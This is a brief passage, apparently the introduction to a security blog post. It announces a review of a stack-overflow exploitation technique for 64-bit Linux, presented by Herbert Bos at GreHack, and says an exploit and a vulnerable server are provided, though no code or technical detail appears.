</ul>Back to last GreHack edition, Herbert Bos has presented a novel technique to exploit stack-based overflows more reliably on Linux. We review hereafter this new exploitation technique and provide an exploit along with the vulnerable server. Even if this technique is portable to multiple platforms, we will focus on a 64-bit Linux OS in this blog post.